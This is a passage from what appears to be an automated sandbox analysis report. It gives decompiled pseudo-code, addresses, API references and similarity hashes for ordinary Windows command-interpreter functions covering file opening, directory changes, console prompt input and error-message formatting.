						if(_t73 != 0xffffffff) {
							goto L15;
						}
						goto L23;
					}
					L15:
					_t79 = 0;
					goto L6;
				} else {
					_t55 = CreateFileW(_a4, _v12, _a12,  &_v32, _t51, 0x80, ??);
					_t73 = _t55;
					if(_t73 == 0xffffffff) {
						L23:
						_t49 = GetLastError();
						 *0x4a574128 = _t49;
						if(_t49 != 0x6e) {
							goto L13;
						}
						 *0x4a574128 = 2;
						goto L13;
					}
					L6:
					__imp___open_osfhandle(8);
					_t77 = _t73;
					_a12 = _t55;
					if((_a8 & 0x00000008) != 0) {
						if(E4A553B03(_t55, _t77, _t55) == 0 && GetFileSize(_t73, _t79) != 0) {
							_v8 = _v8 | 0xffffffff;
							_v16 = _t79;
							if(SetFilePointer(_t73, 0xffffffff,  &_v8, 2) == 0xffffffff) {
								_t49 = GetLastError();
								 *0x4a574128 = _t49;
								if(_t49 == _t79) {
									goto L19;
								}
								if(_a12 == 0xffffffff) {
									_t49 = CloseHandle(_t73);
								} else {
									__imp___close(_a12);
								}
								goto L13;
							}
							L19:
							if(ReadFile(_t73,  &_v16, 1,  &_v20, _t79) == 0) {
								_v8 = _t79;
								SetFilePointer(_t73, _t79,  &_v8, 2);
							}
							if(_v16 == 0x1a) {
								_v8 = _v8 | 0xffffffff;
								SetFilePointer(_t73, 0xffffffff,  &_v8, 2);
							}
						}
					}
					E4A553B3E(_a12);
					return _a12;
				}
			}














                                0x4a553a1b
                                0x4a553a1d
                                0x4a553a20
                                0x4a553a23
                                0x4a553a26
                                0x4a553a30
                                0x4a554abf
                                0x00000000
                                0x4a554abf
                                0x4a553a39
                                0x4a554ab9
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a554ab9
                                0x4a553a3f
                                0x4a553a46
                                0x4a554a98
                                0x4a554a9f
                                0x4a554aa9
                                0x4a554aab
                                0x4a554aab
                                0x4a554aae
                                0x4a553a4c
                                0x4a553a4c
                                0x4a553a4f
                                0x4a553a4f
                                0x4a553a58
                                0x4a553a59
                                0x4a553a5a
                                0x4a55d668
                                0x4a55d66a
                                0x4a55d66f
                                0x4a55d8ef
                                0x4a55d8f1
                                0x4a55d8f6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55d8f6
                                0x4a55d675
                                0x4a55d675
                                0x00000000
                                0x4a553a60
                                0x4a553a73
                                0x4a553a79
                                0x4a553a7e
                                0x4a55d8fc
                                0x4a55d8fc
                                0x4a55d902
                                0x4a55d90a
                                0x00000000
                                0x00000000
                                0x4a569ace
                                0x00000000
                                0x4a569ace
                                0x4a553a84
                                0x4a553a87
                                0x4a553a92
                                0x4a553a93
                                0x4a553a96
                                0x4a55d684
                                0x4a55d6a0
                                0x4a55d6ad
                                0x4a55d6b5
                                0x4a569add
                                0x4a569ae3
                                0x4a569aea
                                0x00000000
                                0x00000000
                                0x4a569af4
                                0x4a569b06
                                0x4a569af6
                                0x4a569af9
                                0x4a569aff
                                0x00000000
                                0x4a569af4
                                0x4a55d6bb
                                0x4a55d6cf
                                0x4a569b19
                                0x4a569b1c
                                0x4a569b1c
                                0x4a55d6da
                                0x4a569b23
                                0x4a569b30
                                0x4a569b30
                                0x4a55d6da
                                0x4a55d684
                                0x4a553a9f
                                0x00000000
                                0x4a553aa4

                                APIs
                                • CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000080,00000000), ref: 4A553A73
                                • _open_osfhandle.MSVCRT ref: 4A553A87
                                • _wcsicmp.MSVCRT ref: 4A554A9F
                                • CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000080,00000000), ref: 4A55D668
                                • GetFileSize.KERNEL32(00000000,00000000,00000000,00008000), ref: 4A55D68C
                                • SetFilePointer.KERNEL32(00000000,000000FF,000000FF,00000002), ref: 4A55D6B0
                                • ReadFile.KERNEL32(00000000,00000008,00000001,?,00000000), ref: 4A55D6C7
                                • GetLastError.KERNEL32 ref: 4A55D8FC
                                • SetFilePointer.KERNEL32(00000000,000000FF,000000FF,00000002), ref: 4A569B30
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$CreatePointer$ErrorLastReadSize_open_osfhandle_wcsicmp
                                • String ID: con
                                • API String ID: 2187688666-4257191772
                                • Opcode ID: 0e027798d2e3cbed8798b6de9dea9ed356ab3d755ac78539d96fc9875ba47cb1
                                • Instruction ID: 0217815611a19374b129b67d9e5e2d1a92ab425953e48023c590197891d850e9
                                • Opcode Fuzzy Hash: 0e027798d2e3cbed8798b6de9dea9ed356ab3d755ac78539d96fc9875ba47cb1
                                • Instruction Fuzzy Hash: 80517E72904249BBEB10AE61CE44A9E7FBDFF45334F104617F929E61E8D7708A418B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A557010, Relevance: 25.7, APIs: 17, Instructions: 230COMMON
                                Download Yara Rule
                                C-Code - Quality: 80%
                                			E4A557010(WCHAR* __ebx, long __edi, long __esi, void* __eflags) {
				intOrPtr _t54;
				WCHAR* _t58;
				WCHAR* _t62;
				short _t67;
				long _t70;
				short _t71;
				long _t75;
				intOrPtr* _t82;
				WCHAR* _t86;
				signed int _t101;
				long _t102;
				WCHAR* _t112;
				short _t113;
				intOrPtr _t117;
				WCHAR* _t121;
				short* _t123;
				void* _t126;
				void* _t137;

				_t125 = __esi;
				_t124 = __edi;
				_t111 = __ebx;
				_push(0x228);
				_push(0x4a557238);
				E4A5513E1(__ebx, __edi, __esi);
				_t112 =  *(_t126 + 8);
				_t54 =  *0x4a590664; // 0x5c
				if( *_t112 == _t54) {
					if(_t112[1] != _t54) {
						goto L2;
					}
					goto L32;
				} else {
					L2:
					_t111 = E4A5519D6(_t112);
					 *(_t126 - 0x234) = _t111;
					if(_t111 == 0) {
						L36:
						_push(8);
						L37:
						L32:
						return E4A5513CA(_t111, _t124, _t125);
					}
					 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
					_t58 = _t111;
					_t5 =  &(_t58[1]); // 0x2
					_t123 = _t5;
					do {
						_t113 =  *_t58;
						_t58 =  &(_t58[1]);
					} while (_t113 != 0);
					_t62 =  &(_t111[_t58 - _t123 >> 1]);
					while(1) {
						 *(_t126 - 0x230) = _t62;
						if(_t62 <= _t111) {
							break;
						}
						_t9 = _t62 - 2; // -2
						_t121 = _t9;
						if( *_t121 == 0x20) {
							_t62 = _t121;
							continue;
						}
						break;
					}
					 *_t62 = 0;
					_t124 = 0x104;
					GetCurrentDirectoryW(0x104, _t126 - 0x22c);
					_t125 = towupper;
					 *(_t126 - 0x238) = towupper( *(_t126 - 0x22c)) & 0x0000ffff;
					_t67 = 0x3d;
					 *((short*)(_t126 - 0x24)) = _t67;
					if(iswalpha( *_t111 & 0x0000ffff) == 0 || _t111[1] != 0x3a) {
						_t70 =  *(_t126 - 0x238);
					} else {
						_t70 = towupper( *_t111 & 0x0000ffff);
					}
					 *(_t126 - 0x22) = _t70;
					_t71 = 0x3a;
					 *((short*)(_t126 - 0x20)) = _t71;
					 *((short*)(_t126 - 0x1e)) = 0;
					_t75 = GetFullPathNameW(_t111, _t124, _t126 - 0x22c, _t126 - 0x230);
					if(_t75 == 0) {
						L39:
						_t125 = GetLastError();
						goto L40;
					} else {
						if(_t75 > _t124) {
							L41:
							_push(0xfffffffe);
							_push(_t126 - 0x10);
							_push(0x4a5740ac);
							L4A57219B();
							goto L32;
						}
						if( *(_t126 - 0x22c) == 0 ||  *((short*)(_t126 - 0x22a)) != 0x3a) {
							_push(0xfffffffe);
							_push(_t126 - 0x10);
							_push(0x4a5740ac);
							L4A57219B();
							_push(3);
							goto L37;
						} else {
							_t82 = _t126 - 0x22c;
							_t23 = _t82 + 2; // 0x2
							_t122 = _t23;
							do {
								_t117 =  *_t82;
								_t82 = _t82 + 2;
							} while (_t117 != 0);
							_t86 = _t126 + (_t82 - _t122 >> 1) * 2 - 0x22c;
							while(1) {
								L18:
								 *(_t126 - 0x230) = _t86;
								if(_t86 <= _t126 - 0x226) {
									break;
								}
								_t29 = _t86 - 2; // -4
								_t112 = _t29;
								_t137 =  *_t112 -  *0x4a590664; // 0x5c
								if(_t137 == 0) {
									goto L1;
								}
								break;
							}
							 *_t86 = 0;
							_t125 = GetFileAttributesW;
							if(GetFileAttributesW(_t126 - 0x22c) == 0xffffffff) {
								_t111 = GetLastError();
								if(_t111 == 2 || _t111 == 3 || _t111 == 0x7b) {
									_t111 =  *(_t126 - 0x234);
									goto L21;
								} else {
									_push(0xfffffffe);
									_push(_t126 - 0x10);
									_push(0x4a5740ac);
									L4A57219B();
									goto L32;
								}
							}
							L21:
							if( *0x4a574081 == 0 || E4A556E47(_t126 - 0x22c, _t124, 0) != 0) {
								if( *((intOrPtr*)(_t126 + 0xc)) == 2) {
									L26:
									if( *((intOrPtr*)(_t126 + 0xc)) == 0 ||  *((intOrPtr*)(_t126 + 0xc)) == 1 &&  *(_t126 - 0x238) ==  *(_t126 - 0x22)) {
										if(SetCurrentDirectoryW(_t126 - 0x22c) == 0) {
											goto L39;
										}
										goto L30;
									} else {
										L30:
										if(E4A551730(_t126 - 0x24, _t126 - 0x22c) != 0) {
											_push(0xfffffffe);
											_push(_t126 - 0x10);
											_push(0x4a5740ac);
											L4A57219B();
											goto L36;
										}
										E4A552C56(_t111, _t122, _t124, 0x4a575260, _t124, 0);
										 *(_t126 - 4) = 0xfffffffe;
										E4A557259(_t111);
										goto L32;
									}
								}
								_t101 = GetFileAttributesW(_t126 - 0x22c);
								if(_t101 == 0xffffffff) {
									_t102 = GetLastError();
									_t125 = _t102;
									if(_t102 == 2) {
										_t125 = 3;
									}
									L40:
									_push(0xfffffffe);
									_push(_t126 - 0x10);
									_push(0x4a5740ac);
									L4A57219B();
									goto L32;
								}
								if((_t101 & 0x00000410) == 0) {
									_push(0xfffffffe);
									_push(_t126 - 0x10);
									_push(0x4a5740ac);
									L4A57219B();
									goto L32;
								}
								goto L26;
							} else {
								goto L41;
							}
						}
					}
				}
				L1:
				_t86 = _t112;
				goto L18;
			}





















                                0x4a557010
                                0x4a557010
                                0x4a557010
                                0x4a557010
                                0x4a557015
                                0x4a55701a
                                0x4a55701f
                                0x4a557022
                                0x4a55702b
                                0x4a55c15f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a557031
                                0x4a557031
                                0x4a557037
                                0x4a557039
                                0x4a557041
                                0x4a569f11
                                0x4a569f11
                                0x4a569f13
                                0x4a557229
                                0x4a55722e
                                0x4a55722e
                                0x4a557047
                                0x4a55704b
                                0x4a55704d
                                0x4a55704d
                                0x4a557050
                                0x4a557050
                                0x4a557054
                                0x4a557055
                                0x4a55705e
                                0x4a557061
                                0x4a557061
                                0x4a557069
                                0x00000000
                                0x00000000
                                0x4a55706b
                                0x4a55706b
                                0x4a557072
                                0x4a569f19
                                0x00000000
                                0x4a569f19
                                0x00000000
                                0x4a557072
                                0x4a55707a
                                0x4a557084
                                0x4a55708a
                                0x4a557096
                                0x4a5570a1
                                0x4a5570a9
                                0x4a5570aa
                                0x4a5570bc
                                0x4a56055a
                                0x4a5570cd
                                0x4a5570d1
                                0x4a5570d3
                                0x4a5570d4
                                0x4a5570da
                                0x4a5570db
                                0x4a5570e1
                                0x4a5570f5
                                0x4a5570fd
                                0x4a569f20
                                0x4a569f26
                                0x00000000
                                0x4a557103
                                0x4a557105
                                0x4a569f42
                                0x4a569f42
                                0x4a569f47
                                0x4a569f48
                                0x4a569f4d
                                0x00000000
                                0x4a569f55
                                0x4a557113
                                0x4a569fe5
                                0x4a569fea
                                0x4a569feb
                                0x4a569ff0
                                0x4a569ff8
                                0x00000000
                                0x4a557127
                                0x4a557127
                                0x4a55712d
                                0x4a55712d
                                0x4a557130
                                0x4a557130
                                0x4a557134
                                0x4a557135
                                0x4a55713e
                                0x4a557145
                                0x4a557145
                                0x4a557145
                                0x4a557153
                                0x00000000
                                0x00000000
                                0x4a557155
                                0x4a557155
                                0x4a55715b
                                0x4a557162
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a557162
                                0x4a55716a
                                0x4a557174
                                0x4a55717f
                                0x4a569f65
                                0x4a569f6a
                                0x4a569f90
                                0x00000000
                                0x4a569f76
                                0x4a569f76
                                0x4a569f7b
                                0x4a569f7c
                                0x4a569f81
                                0x00000000
                                0x4a569f89
                                0x4a569f6a
                                0x4a557185
                                0x4a55718c
                                0x4a5571a9
                                0x4a5571c8
                                0x4a5571cc
                                0x4a5571f0
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5571f6
                                0x4a5571f6
                                0x4a557208
                                0x4a569fcd
                                0x4a569fd2
                                0x4a569fd3
                                0x4a569fd8
                                0x00000000
                                0x4a569fdd
                                0x4a557216
                                0x4a55721b
                                0x4a557222
                                0x00000000
                                0x4a557227
                                0x4a5571cc
                                0x4a5571b2
                                0x4a5571b7
                                0x4a569f9b
                                0x4a569fa1
                                0x4a569fa6
                                0x4a569faa
                                0x4a569faa
                                0x4a569f28
                                0x4a569f28
                                0x4a569f2d
                                0x4a569f2e
                                0x4a569f33
                                0x00000000
                                0x4a569f3b
                                0x4a5571c2
                                0x4a569fb0
                                0x4a569fb5
                                0x4a569fb6
                                0x4a569fbb
                                0x00000000
                                0x4a569fc3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55718c
                                0x4a557113
                                0x4a5570fd
                                0x4a552ccf
                                0x4a552ccf
                                0x00000000

                                APIs
                                • GetCurrentDirectoryW.KERNEL32(00000104,?,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C,?,4A556CE6,00000000,00000001,00000000,00000000,4A5572F5,00000000), ref: 4A55708A
                                • towupper.MSVCRT ref: 4A55709C
                                • iswalpha.MSVCRT ref: 4A5570B2
                                • towupper.MSVCRT ref: 4A5570D1
                                • GetFullPathNameW.KERNEL32(00000000,00000104,?,?,4A569A33,00000001,0000233A,4A5525B8), ref: 4A5570F5
                                • GetFileAttributesW.KERNEL32(00000000), ref: 4A55717A
                                • GetFileAttributesW.KERNEL32(00000000), ref: 4A5571B2
                                • SetCurrentDirectoryW.KERNEL32(00000000), ref: 4A5571E8
                                • _local_unwind4.MSVCRT ref: 4A569FBB
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AttributesCurrentDirectoryFiletowupper$FullNamePath_local_unwind4iswalpha
                                • String ID:
                                • API String ID: 1128778107-0
                                • Opcode ID: 70fc33557c03a082a7e3db52e4a47ffcc2cc685888ab648c74a68dd77307027b
                                • Instruction ID: 55a904e6d65a922c062cfd8920e371a90147b35c9d0783f6391e98c82c8b1317
                                • Opcode Fuzzy Hash: 70fc33557c03a082a7e3db52e4a47ffcc2cc685888ab648c74a68dd77307027b
                                • Instruction Fuzzy Hash: B8811871901115EADB11EBA0DE48AADBBB8EF49310F124967F518EB198F770CA84CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56CB35, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E4A56CB35(void* __edx, void* __edi, void* __esi, char _a4) {
				signed int _v8;
				char _v2056;
				char _v2057;
				char _v2058;
				wchar_t* _v2064;
				signed int _v2068;
				wchar_t* _v2072;
				long _v2076;
				void* _v2080;
				void* _v2084;
				long _v2088;
				void* __ebx;
				signed int _t45;
				void* _t48;
				signed int _t50;
				wchar_t* _t51;
				short* _t53;
				void* _t56;
				void* _t58;
				signed int _t59;
				void* _t60;
				signed int _t61;
				signed int _t67;
				signed int _t68;
				short* _t72;
				long _t75;
				long _t78;
				wchar_t* _t81;
				wchar_t* _t82;
				wchar_t* _t83;
				signed int _t84;
				short _t87;
				signed short* _t88;
				signed int _t98;
				void* _t106;
				long _t108;
				signed int _t113;

				_t110 = __esi;
				_t107 = __edi;
				_t106 = __edx;
				_t45 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t45 ^ _t113;
				_t2 =  &_a4; // 0x4a565473
				_v2058 = 0;
				_v2057 = 0;
				_t48 = E4A5519D6( *_t2);
				_t87 = 0;
				if(_t48 != 0) {
					_t88 = E4A552D9B(_t48);
					_t50 =  *_t88 & 0x0000ffff;
					_v2072 = _t88;
					__eflags = _t50;
					if(_t50 != 0) {
						_push(__esi);
						_push(__edi);
						_t108 = 0x22;
						__eflags = _t50 - _t108;
						if(_t50 == _t108) {
							_t83 = E4A552D9B( &(_t88[1]));
							_v2072 = _t83;
							_t84 = wcsrchr(_t83, _t108);
							__eflags = _t84;
							if(_t84 != 0) {
								__eflags = 0;
								 *_t84 = 0;
							}
						}
						_t51 = wcschr(_v2072, 0x3d);
						_pop(_t90);
						__eflags = _t51 - _t87;
						if(_t51 != _t87) {
							_t90 = 0;
							 *_t51 = 0;
							_t53 = E4A552D9B( &(_t51[0]));
							_v2064 = _t53;
							__eflags =  *_t53 - _t108;
							if( *_t53 == _t108) {
								_t81 = E4A552D9B(_t53 + 2);
								_v2064 = _t81;
								_t82 = wcsrchr(_t81, _t108);
								_pop(_t90);
								__eflags = _t82 - _t87;
								if(_t82 != _t87) {
									_t90 = 0;
									__eflags = 0;
									 *_t82 = 0;
								}
								_t53 = _v2064;
							}
							__eflags =  *_t53 - 0x3d;
							if( *_t53 == 0x3d) {
								goto L8;
							} else {
								_t58 = GetStdHandle(0xfffffff5);
								_v2084 = _t58;
								_t59 = GetConsoleMode(_t58,  &_v2088);
								_t87 = SetConsoleMode;
								__eflags = _t59;
								if(_t59 != 0) {
									_t78 = _v2088 | 0x00000001;
									__eflags = _t78;
									_v2058 = 1;
									SetConsoleMode(_v2084, _t78);
								}
								_t60 = GetStdHandle(0xfffffff6);
								_t96 =  &_v2076;
								_v2080 = _t60;
								_t61 = GetConsoleMode(_t60,  &_v2076);
								__eflags = _t61;
								if(_t61 != 0) {
									_t75 = _v2076 | 0x00000007;
									__eflags = _t75;
									_v2057 = 1;
									SetConsoleMode(_v2080, _t75);
								}
								E4A5599E1(_t96, 0x2371, 1, _v2064);
								_v2056 = 0;
								_push( &_v2068);
								_push(0x3ff);
								_t67 = E4A5567D3(GetStdHandle(0xfffffff6),  &_v2056);
								__eflags = _t67;
								if(_t67 == 0) {
									L28:
									_t31 =  &_v2068;
									 *_t31 = _v2068 & 0x00000000;
									__eflags =  *_t31;
								} else {
									_t98 = _v2068;
									__eflags = _t98;
									if(__eflags == 0) {
										goto L28;
									}
									if(__eflags <= 0) {
										L29:
										__eflags = _v2058;
										if(_v2058 != 0) {
											SetConsoleMode(_v2084, _v2088);
										}
										__eflags = _v2057;
										if(_v2057 != 0) {
											SetConsoleMode(_v2080, _v2076);
										}
										_t68 = _v2068;
										__eflags = _t68;
										if(_t68 == 0) {
											goto L9;
										} else {
											 *((short*)(_t113 + _t68 * 2 - 0x804)) = 0;
											_t56 = E4A551730(_v2072,  &_v2056);
											goto L10;
										}
									}
									_t72 = _t113 + _t98 * 2 - 0x806;
									while(1) {
										__eflags =  *_t72 - 0x20;
										if( *_t72 >= 0x20) {
											goto L29;
										}
										_t98 = _t98 - 1;
										_t72 = _t72;
										_v2068 = _t98;
										__eflags = _t98;
										if(_t98 <= 0) {
											goto L29;
										}
									}
								}
								goto L29;
							}
						} else {
							L8:
							_push(_t87);
							_push(0x232a);
							E4A556D44(_t90);
							L9:
							_t56 = 1;
							__eflags = 1;
							L10:
							_pop(_t107);
							_pop(_t110);
							L11:
							return E4A5513A9(_t56, _t87, _v8 ^ _t113, _t106, _t107, _t110);
						}
					}
					_push(0);
					_push(0x232a);
					E4A556D44(_t88);
				}
				_t56 = 1;
				goto L11;
			}








































                                0x4a56cb35
                                0x4a56cb35
                                0x4a56cb35
                                0x4a56cb40
                                0x4a56cb47
                                0x4a56cb4a
                                0x4a56cb4f
                                0x4a56cb56
                                0x4a56cb5d
                                0x4a56cb62
                                0x4a56cb66
                                0x4a56cb73
                                0x4a56cb75
                                0x4a56cb78
                                0x4a56cb7e
                                0x4a56cb81
                                0x4a56cb92
                                0x4a56cb99
                                0x4a56cb9c
                                0x4a56cb9d
                                0x4a56cba0
                                0x4a56cba6
                                0x4a56cbad
                                0x4a56cbb3
                                0x4a56cbb7
                                0x4a56cbb9
                                0x4a56cbbb
                                0x4a56cbbd
                                0x4a56cbbd
                                0x4a56cbb9
                                0x4a56cbc8
                                0x4a56cbcf
                                0x4a56cbd0
                                0x4a56cbd2
                                0x4a56cbf5
                                0x4a56cbf7
                                0x4a56cbfe
                                0x4a56cc03
                                0x4a56cc09
                                0x4a56cc0c
                                0x4a56cc12
                                0x4a56cc19
                                0x4a56cc1f
                                0x4a56cc22
                                0x4a56cc23
                                0x4a56cc25
                                0x4a56cc27
                                0x4a56cc27
                                0x4a56cc29
                                0x4a56cc29
                                0x4a56cc2c
                                0x4a56cc2c
                                0x4a56cc32
                                0x4a56cc36
                                0x00000000
                                0x4a56cc38
                                0x4a56cc40
                                0x4a56cc50
                                0x4a56cc56
                                0x4a56cc58
                                0x4a56cc5e
                                0x4a56cc60
                                0x4a56cc68
                                0x4a56cc68
                                0x4a56cc72
                                0x4a56cc79
                                0x4a56cc79
                                0x4a56cc7d
                                0x4a56cc7f
                                0x4a56cc87
                                0x4a56cc8d
                                0x4a56cc8f
                                0x4a56cc91
                                0x4a56cc99
                                0x4a56cc99
                                0x4a56cca3
                                0x4a56ccaa
                                0x4a56ccaa
                                0x4a56ccb9
                                0x4a56ccc3
                                0x4a56ccd0
                                0x4a56ccd1
                                0x4a56cce2
                                0x4a56cce7
                                0x4a56cce9
                                0x4a56cd13
                                0x4a56cd13
                                0x4a56cd13
                                0x4a56cd13
                                0x4a56cceb
                                0x4a56cceb
                                0x4a56ccf1
                                0x4a56ccf3
                                0x00000000
                                0x00000000
                                0x4a56ccf5
                                0x4a56cd1a
                                0x4a56cd1a
                                0x4a56cd21
                                0x4a56cd2f
                                0x4a56cd2f
                                0x4a56cd31
                                0x4a56cd38
                                0x4a56cd46
                                0x4a56cd46
                                0x4a56cd48
                                0x4a56cd4e
                                0x4a56cd50
                                0x00000000
                                0x4a56cd56
                                0x4a56cd58
                                0x4a56cd6d
                                0x00000000
                                0x4a56cd6d
                                0x4a56cd50
                                0x4a56ccf7
                                0x4a56ccfe
                                0x4a56ccfe
                                0x4a56cd02
                                0x00000000
                                0x00000000
                                0x4a56cd04
                                0x4a56cd06
                                0x4a56cd07
                                0x4a56cd0d
                                0x4a56cd0f
                                0x00000000
                                0x00000000
                                0x4a56cd11
                                0x4a56ccfe
                                0x00000000
                                0x4a56cce9
                                0x4a56cbd4
                                0x4a56cbd4
                                0x4a56cbd4
                                0x4a56cbd5
                                0x4a56cbda
                                0x4a56cbe1
                                0x4a56cbe3
                                0x4a56cbe3
                                0x4a56cbe4
                                0x4a56cbe4
                                0x4a56cbe5
                                0x4a56cbe6
                                0x4a56cbf2
                                0x4a56cbf2
                                0x4a56cbd2
                                0x4a56cb83
                                0x4a56cb84
                                0x4a56cb89
                                0x4a56cb8f
                                0x4a56cb6a
                                0x00000000

                                APIs
                                • wcsrchr.MSVCRT ref: 4A56CBB3
                                • wcschr.MSVCRT ref: 4A56CBC8
                                • wcsrchr.MSVCRT ref: 4A56CC1F
                                • GetStdHandle.KERNEL32(000000F5,-00000002), ref: 4A56CC40
                                • GetConsoleMode.KERNEL32 ref: 4A56CC56
                                • SetConsoleMode.KERNEL32 ref: 4A56CC79
                                • GetStdHandle.KERNEL32(000000F6), ref: 4A56CC7D
                                • GetConsoleMode.KERNEL32 ref: 4A56CC8D
                                • SetConsoleMode.KERNEL32 ref: 4A56CCAA
                                • GetStdHandle.KERNEL32(000000F6,?,000003FF,?), ref: 4A56CCDF
                                  • Part of subcall function 4A552D9B: iswspace.MSVCRT ref: 4A552DAD
                                • SetConsoleMode.KERNEL32 ref: 4A56CD2F
                                • SetConsoleMode.KERNEL32 ref: 4A56CD46
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                • String ID: sTVJ
                                • API String ID: 4166807220-1234371678
                                • Opcode ID: ee84488c69ca27260a9f63415e6ce3b0b1abf6b1eac0d0053242b99b98691d60
                                • Instruction ID: b07805f7c062c5191640375db3c68e8e27ec66c38cb0e8d5eff7fd4de61c30df
                                • Opcode Fuzzy Hash: ee84488c69ca27260a9f63415e6ce3b0b1abf6b1eac0d0053242b99b98691d60
                                • Instruction Fuzzy Hash: 3951E471904258AEDB61AB64DE44B9A7BF8FF04350F01C4EAE14DE7190EE708E85CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5598A5, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 151windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 43%
                                			E4A5598A5(signed int __edx, long _a4, char* _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v8;
				char _v40;
				short _v104;
				signed int _v108;
				intOrPtr* _v112;
				void* _v116;
				char* _v120;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed int _t43;
				WCHAR* _t50;
				void* _t54;
				signed short* _t56;
				signed int _t58;
				va_list* _t61;
				signed int _t68;
				char* _t69;
				intOrPtr* _t70;
				signed int _t72;
				void* _t73;
				WCHAR* _t74;
				signed int _t75;

				_t72 = __edx;
				_t36 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t36 ^ _t75;
				_t73 = FormatMessageW;
				_v112 = _a16;
				_t74 = 0x4a584640;
				if(_a4 == 0x13d || FormatMessageW(0x1a00, 0, _a4, 0, 0x4a584640, 0x2000, 0) == 0) {
					__imp___ultoa(_a4,  &_v40, 0x10);
					_t43 = E4A554B8D(GetACP());
					asm("sbb eax, eax");
					MultiByteToWideChar(0,  ~( ~_t43),  &_v40, 0xffffffff,  &_v104, 0x20);
					_v124 =  &_v104;
					_v120 = L"Application";
					if(_a4 < 0x2328) {
						_v120 = L"System";
					}
					_push( &_v124);
					_push(0x2000);
					_push(_t74);
					_push(0);
					_push(0x13d);
					_push(0);
					_push(0x3000);
					goto L9;
				} else {
					_v108 = _v108 & 0x00000000;
					_t54 = E4A5518EB(0x4a584640, 0x25);
					if(_t54 == 0) {
						L8:
						_push(_v112);
						_push(0x2000);
						_push(_t74);
						_push(0);
						_push(_a4);
						_push(0);
						_push(0x1800);
						L9:
						_t74 = FormatMessageW();
						L10:
						_t50 = _t74;
						L11:
						return E4A5513A9(_t50, 0x2000, _v8 ^ _t75, _t72, _t73, _t74);
					} else {
						goto L3;
					}
					do {
						L3:
						_t56 = _t54 + 2;
						_t68 =  *_t56 & 0x0000ffff;
						if(_t68 < 0x31 || _t68 > 0x39) {
							if(_t68 == 0x25) {
								_t56 =  &(_t56[1]);
							}
						} else {
							_v108 = _v108 + 1;
						}
						_t54 = E4A5518EB(_t56, 0x25);
					} while (_t54 != 0);
					_t58 = _v108;
					if(_t58 > _a12) {
						_t61 = HeapAlloc(GetProcessHeap(), 0, _t58 << 2);
						_t72 = 0;
						_v116 = _t61;
						if(_t61 != 0) {
							if(_v108 <= 0) {
								L25:
								_t74 = FormatMessageW(0x3800, 0, _a4, 0, _t74, 0x2000, _t61);
								HeapFree(GetProcessHeap(), 0, _v116);
								goto L10;
							} else {
								goto L21;
							}
							do {
								L21:
								if(_t72 >= _a12) {
									_t69 = _a8;
								} else {
									_t70 = _v112;
									 *_t70 =  *_t70 + 4;
									_t69 =  *( *_t70 - 4);
								}
								_t61[_t72] = _t69;
								_t72 = _t72 + 1;
							} while (_t72 < _v108);
							goto L25;
						}
						_t50 = 0;
						goto L11;
					}
					goto L8;
				}
			}




























                                0x4a5598a5
                                0x4a5598ad
                                0x4a5598b4
                                0x4a5598c4
                                0x4a5598ca
                                0x4a5598d2
                                0x4a5598d7
                                0x4a569840
                                0x4a56985c
                                0x4a569863
                                0x4a56986a
                                0x4a56987a
                                0x4a56987d
                                0x4a569884
                                0x4a569886
                                0x4a569886
                                0x4a569890
                                0x4a569891
                                0x4a569892
                                0x4a569893
                                0x4a569895
                                0x4a56989a
                                0x4a56989c
                                0x00000000
                                0x4a5598f6
                                0x4a5598f6
                                0x4a5598fd
                                0x4a559904
                                0x4a559932
                                0x4a559932
                                0x4a559935
                                0x4a559936
                                0x4a559937
                                0x4a559939
                                0x4a55993c
                                0x4a55993e
                                0x4a559943
                                0x4a559945
                                0x4a559947
                                0x4a559947
                                0x4a559949
                                0x4a559957
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a559906
                                0x4a559906
                                0x4a559907
                                0x4a559908
                                0x4a55990f
                                0x4a55995e
                                0x4a5698a7
                                0x4a5698a7
                                0x4a559917
                                0x4a559917
                                0x4a559917
                                0x4a55991d
                                0x4a559922
                                0x4a559926
                                0x4a55992c
                                0x4a5698ba
                                0x4a5698c0
                                0x4a5698c2
                                0x4a5698c7
                                0x4a5698d3
                                0x4a5698f3
                                0x4a569907
                                0x4a569912
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5698d5
                                0x4a5698d5
                                0x4a5698d8
                                0x4a5698e7
                                0x4a5698da
                                0x4a5698da
                                0x4a5698dd
                                0x4a5698e2
                                0x4a5698e2
                                0x4a5698ea
                                0x4a5698ed
                                0x4a5698ee
                                0x00000000
